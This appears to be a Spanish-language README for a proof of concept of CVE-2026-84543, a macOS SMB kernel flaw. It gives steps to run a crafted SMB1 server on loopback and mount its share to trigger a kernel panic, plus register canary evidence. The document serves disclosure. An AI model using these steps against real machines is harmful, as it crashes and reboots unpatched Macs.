
Prueba de concepto y divulgación técnica de CVE-2026-84543, una vulnerabilidad del kernel SMB de macOS que provoca un kernel panic mediante respuestas SMB1 manipuladas.
Se espera que esta prueba de concepto provoque un kernel panic y reinicie un Mac afectado.
Las compilaciones de prueba afectadas utilizadas durante la investigación fueron macOS Tahoe 26.4 (25E246) y macOS 26.5 beta 4 (25F5068a). Apple corrigió CVE-2026-84543 en macOS Golden Gate 27, Tahoe 26.7 y Sequoia 15.8.
smb1_unix_whoami_poc.py es el servidor de captura de evidencia en loopback. Utiliza únicamente
la biblioteca estándar de Python y:
_COMM_PAGE_ASB_TARGET_KERN_VALUE del arranque actual en Apple silicon;SMB_QFS_POSIX_WHOAMI (0x0202) manipulada para crear el
estado inconsistente de contador/puntero; y0x020B) que contienen valores canary reconocibles
para la procedencia de los registros del panic.En la terminal A:
cd poc
sudo python3 smb1_unix_whoami_poc.py \
--bind 127.0.0.1 \
--port 445 \
--log /tmp/CVE-2026-84543-poc.log
Anota el ASB_TARGET_KERN_VALUE impreso; se aleatoriza en cada arranque.
En la terminal B:
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543
Con T igual al canary del valor del kernel impreso en el arranque:
x8 = T
x9 = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1
Los bits específicos en x8, x9 y x11 establecen la procedencia. Las relaciones
observadas proporcionan un vínculo byte a byte entre los campos de respuesta
del servidor y el estado de los registros del kernel en vivo.